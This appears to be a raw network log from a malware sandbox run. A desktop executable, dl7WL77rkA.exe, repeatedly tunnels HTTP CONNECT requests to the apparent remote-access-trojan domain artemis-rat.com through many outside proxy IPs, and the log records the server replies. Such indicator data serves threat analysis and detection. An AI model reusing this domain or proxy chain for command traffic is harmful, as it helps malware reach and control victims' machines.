                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.993762970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092549086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            350192.168.2.550992104.25.81.82803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.996726036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.157180071 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            351192.168.2.55094738.162.5.22331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.001975060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.427506924 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            352192.168.2.551016172.67.206.105803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.006752014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.163444042 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            353192.168.2.55088952.196.1.182803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.014061928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.277811050 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            354192.168.2.55084045.11.95.16550033876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.014919043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.506150961 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            355192.168.2.55089968.1.210.16341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.016108036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            356192.168.2.550898184.181.217.22041453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.016109943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            357192.168.2.550875103.197.71.7803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.021948099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            358192.168.2.5508738.213.128.904443876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.029680967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.366126060 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            359192.168.2.550856201.149.127.2280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.037446022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.779808998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.858026028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108262062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            360192.168.2.550124175.100.91.15180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.046051979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.108056068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            361192.168.2.55069151.68.164.77168923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.049294949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.076718092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            362192.168.2.55089513.38.176.10431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.053488016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.350292921 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            363192.168.2.550851212.23.217.3580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.056961060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.811074972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.697926998 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            364192.168.2.5508908.218.100.12080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.058825016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.362978935 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            365192.168.2.550907212.110.188.222344113876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.058828115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.483002901 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            366192.168.2.55089343.133.71.20156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087192059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            367192.168.2.550611199.58.185.941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087234974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            368192.168.2.55091543.129.228.4678903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087356091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.399050951 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            369192.168.2.551091104.16.104.12803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087615013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.242146015 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            370192.168.2.551092185.162.228.128803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087620020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.241807938 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            371192.168.2.550925154.85.58.149803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087707996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.419852018 CET321INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 163
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.15.8.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            372192.168.2.551122172.67.182.126803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.087717056 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.242111921 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            373192.168.2.551096104.22.50.220803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.087727070 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.242331028 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            374192.168.2.55087145.4.144.23241533876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.088284969 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            375192.168.2.550932163.172.144.132163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.089534998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.732954025 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.607966900 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.389739037 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
